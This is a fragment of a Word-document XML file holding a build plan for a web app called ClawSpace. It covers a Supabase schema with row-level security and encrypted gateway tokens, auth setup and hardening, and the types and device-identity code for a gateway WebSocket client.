        </w:rPr>
        <w:t xml:space="preserve"> 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gateway_url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excluded.gateway_url,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    gateway_token_encrypted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p_gateway_token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encrypt_gateway_token(p_gateway_token)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gateway_connections.gateway_token_encrypted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v_id;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Helper to retrieve a connection (decrypts token server-side)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Only returns the token for the authenticated user's own connections.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get_gateway_connection(p_name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gateway_url text,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  gateway_token text,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gc.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gc.name,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    gc.gateway_url,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gc.gateway_token_encrypted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decrypt_gateway_token(gc.gateway_token_encrypted)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gateway_token,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    gc.is_active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gateway_connections gc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gc.user_id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gc.name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p_name;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icon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text,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  custom_instructions text,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  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session_key)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Chat messages (local mirror of Gateway transcripts)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'tool'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tool_calls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run_id text,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Artifacts extracted from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language text,           </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-- for code artifacts</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  content text,            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-- inline content</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  file_url text,           </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Supabase storage URL (binary)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  mime_type text,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  size_bytes bigint,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idx_messages_project_id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messages(project_id,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idx_artifacts_project_id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projects(user_id);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Row Level Security (MANDATORY — every table)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-- This is the REAL authorization layer. Client-side checks are</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-- convenience only. RLS is what prevents user A from reading</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-- user B's data even if the client is compromised.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gateway_connections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Split policies by operation for audit clarity.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Using separate SELECT/INSERT/UPDATE/DELETE policies instead of</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-- a single "for all" makes it easier to reason about permissions.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Gateway connections: users see only their own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"connections_select"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gateway_connections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"connections_insert"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gateway_connections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"connections_update"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gateway_connections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"connections_delete"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gateway_connections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Block direct reads of gateway_token_encrypted column.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Users should use get_gateway_connection() function instead.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-- The RLS policy allows row access but the encrypted column is opaque</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-- without the decryption key (which only the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DEFINER functions have).</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Projects: users see only their own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"projects_select"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"projects_insert"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"projects_update"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"projects_delete"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Messages: users access messages in their own projects only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"messages_select"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"messages_insert"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"messages_update"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"messages_delete"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br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Artifacts: same pattern as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"artifacts_select"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"artifacts_insert"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"artifacts_update"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"artifacts_delete"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  <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Updated_at trigger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projects_updated_at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gateway_connections_updated_at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gateway_connections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update_updated_at();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Run via Supabase dashboard SQL editor or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.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="42"/>
    <w:bookmarkStart w:id="43" w:name="step-1.2-supabase-client-setup"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 1.2: Supabase Client Setup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">src/lib/supabase/client.ts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Browser client: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src/lib/supabase/server.ts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Server client: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setAll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(cookiesToSet)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Server Component — can't set cookies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step-1.3-auth-middleware"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 1.3: Auth Middleware</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">src/middleware.ts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'/signup'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'/api/auth/callback'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pathname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public paths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(publicPaths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supabaseResponse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request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setAll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(cookiesToSet) {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">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supabaseResponse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request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supabaseResponse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supabaseResponse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'/((?!_next/static|_next/image|favicon.ico|.*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.(?:svg|png|jpg|jpeg|gif|webp)$).*)'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4"/>
    <w:bookmarkStart w:id="45" w:name="step-1.4-login-signup-pages"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 1.4: Login &amp; Signup Pages</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">src/app/(auth)/login/page.tsx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Build a clean login form with:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Email + password fields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 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">link</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Error display (toast via Sonner)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Quick-connect support: check URL params</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">?gatewayUrl=...&amp;token=...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and store them in localStorage before redirecting to the app (see Step 3.3)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">src/app/(auth)/signup/page.tsx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Email + password + confirm password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Already have an account? Log in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">link</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/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on success</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="45"/>
    <w:bookmarkStart w:id="46" w:name="step-1.5-auth-callback-route"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 1.5: Auth Callback Route</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">src/app/api/auth/callback/route.ts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exchangeCodeForSession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X1cd22a41ba89d3a193c6e27f5f99405410c383f"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 1.6: Auth Hardening (Supabase Dashboard Configuration)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Configure these settings in the Supabase dashboard BEFORE any user-facing code ships.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Authentication → Settings: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Password minimum length:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Set to 8 characters minimum (12+ recommended)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Enable email confirmation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">for production (disable only in development)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Disable signup</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">if you want invite-only access during beta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Session lifetime:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Set JWT expiry to 1 hour, refresh token to 7 days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Rate limiting:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Supabase has built-in rate limits; verify they’re enabled:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1008"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sign-in: 30 requests per hour per IP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1008"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sign-up: 6 per hour per IP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1008"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Token refresh: 30 per hour per session</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Authentication → URL Configuration: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Site URL:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Set to your production domain (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">https://clawspace.app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Redirect URLs:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Add only your known domains. Do NOT use wildcards in production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Database → Extensions:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1010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(needed for token encryption)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">API → Settings:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1011"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Verify the service role key is NEVER exposed in client-side code</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1011"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The anon key is public by design — security comes from RLS, not key secrecy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Test RLS policies before proceeding. Create a test user, insert a project, then try to query it as a different user. The query must return zero rows. This is your most important security test.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hase-2-gateway-websocket-client"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Phase 2: Gateway WebSocket Client</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Time estimate: ~5 hours</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Dependencies: Phase 0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Gateway URL validation, frame schema validation, token handling hygiene, WS protocol security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This is the most critical module in the entire app. It must implement the Gateway protocol exactly.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This module directly handles gateway tokens and opens WebSocket connections to user-controlled URLs. Every input must be validated. Tokens must never appear in logs, URLs, error messages, or stack traces.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="49" w:name="step-2.1-protocol-types"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 2.1: Protocol Types</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">src/lib/gateway/types.ts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===== Frame Types (the actual wire format) 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RequestFrame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ResponseFrame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ErrorShape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EventFrame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presence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GatewayFrame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RequestFrame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ResponseFrame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EventFrame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ErrorShape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retryAfterMs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Connect Handshake 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ConnectChallenge {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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ConnectParams {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  minProtocol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Must be a valid GatewayClientId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deviceFamily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modelIdentifier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Must be a valid GatewayClientMode</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    instanceId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commands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device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signedAt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userAgent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HelloOk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'hello-ok'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canvasHostUrl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deviceToken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issuedAtMs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maxBufferedBytes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tickIntervalMs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Snapshot {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  presence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PresenceEntry[]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presence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configPath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stateDir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sessionDefaults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defaultAgentId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mainKey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mainSessionKey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PresenceEntry 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lastInputSeconds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instanceId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Chat Types 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ChatSendParams {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thinking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deliver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attachments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idempotencyKey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— not optional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ChatSendResult {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'in_flight'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ChatHistoryParams {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1-1000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ChatAbortParams {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ChatInjectParams {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Chat event payload — delivered as EventFrame with event="chat"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ChatEventPayload {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"event" field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 content delta or final message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stopReason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Session Types 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SessionsListParams {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includeGlobal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includeUnknown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includeDerivedTitles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includeLastMessage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spawnedBy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SessionsPatchParams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thinkingLevel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many more optional fields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SessionsResetParams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SessionsDeleteParams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deleteTranscript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Agent Events (tool calls etc.) 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AgentEventPayload {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 "agent:main:clawspace:xxx"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">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Connection Config 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GatewayConnectionConfig {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If true, skip device identity (only works with allowInsecureAuth on Gateway) */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  insecureAuth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Gateway URL validation — prevent connecting to arbitrary endpoints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validateGatewayUrl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isInsecure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be ws: or wss: protocol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 must use ws:// or wss:// protocol'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 obviously dangerous targets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hostname'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Warn about insecure connections (non-localhost ws://)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isLocalhost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'::1'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isInsecure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isLocalhost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isInsecure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URL format'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step-2.2-device-identity-module"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 2.2: Device Identity Module</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">src/lib/gateway/device-identity.ts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The Gateway requires device identity for non-local connections. This involves:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. Generating an ECDSA P-256 keypair via WebCrypto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2. Deriving a deviceId from the public key fingerprint</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3. Signing the challenge nonce</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">4. Persisting the keypair in IndexedDB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DB_NAME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'clawspace-device'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'keys'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'device-keypair'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StoredIdentity {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base64 SPKI</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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CryptoKey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StoredIdentity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IDBDatabase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(DB_NAME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onupgradeneeded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(STORE_NAME)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CryptoKeyPair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'ECDSA'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namedCurve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'P-256'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private key NOT extractable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'sign'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arrayToBase64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(buf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btoa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fromCharCode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(buf)))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base64ToArray</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(b64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ArrayBuffer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atob</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(b64)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(binary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binary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bytes[i]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charCodeAt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deriveDeviceId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(publicKey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CryptoKey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'spki'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'SHA-256'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spki)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(hash))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32-char hex fingerprint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getDeviceIdentity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StoredIdentity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WebCrypto is available (requires secure context)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'WebCrypto not available — device identity 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to load existing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(STORE_NAME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'readonly'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(STORE_NAME)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privateKey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publicKeyB64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deviceId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publicKeyB64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privateKey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new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generateKeyPair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exportKey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'spki'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publicKeyB64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arrayToBase64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(spki)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deriveDeviceId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(keyPair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(STORE_NAME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(STORE_NAME)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publicKeyB64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privateKey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publicKeyB64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keyPair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privateKey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create device identity:'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Build the signing payload for challenge nonce.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> * Must match what the Gateway expects.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buildSignPayload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signedAtMs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Control UI builds a JSON payload to sign.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Exact format must match server expectation.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signedAtMs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signChallenge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CryptoKey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TextEncoder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'ECDSA'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'SHA-256'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encoded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arrayToBase64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(signature)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buildSignPayload }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="50"/>
    <w:bookmarkStart w:id="51" w:name="step-2.3-device-token-storage"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 2.3: Device Token Storage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">src/lib/gateway/device-token.ts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The Gateway issues device tokens after successful pairing. Store per deviceId+role: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STORAGE_KEY_PREFIX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'clawspace.deviceToken.'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StoredDeviceToken {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getStoredDeviceToken</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(deviceId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STORAGE_KEY_PREFIX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deviceId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StoredDeviceToken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storeDeviceToken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STORAGE_KEY_PREFIX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deviceId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localStorage full or unavailable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clearDeviceToken</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(deviceId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STORAGE_KEY_PREFIX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deviceId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ignore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X5f1771d38d26bae0198951c24d667cae9afc631"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 2.4: The Gateway WebSocket Client (CORE)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">src/lib/gateway/client.ts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This is the heart of the app. It handles:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- WebSocket connection lifecycle</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Multi-step handshake (challenge → connect → hello-ok)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Request/response correlation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Event routing (chat events, tick events, agent events)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Reconnection with exponential backoff</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Device identity + token management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nanoid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'nanoid'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GatewayFrame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RequestFrame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ResponseFrame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HelloOk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ConnectChallenge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GatewayConnectionConfig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ChatEventPayload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AgentEventPayload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getDeviceIdentity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signChallenge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buildSignPayload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'./device-identity'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getStoredDeviceToken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storeDeviceToken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clearDeviceToken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'./device-token'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PROTOCOL_VERSION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'webchat-ui'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Must be valid GatewayClientId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'webchat'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Must be valid GatewayClientMode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'0.1.0'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'operator'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'operator.read'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'operator.write'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RPC_TIMEOUT_MS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5_000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'handshaking'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PendingRequest {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GatewayClientEvents {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
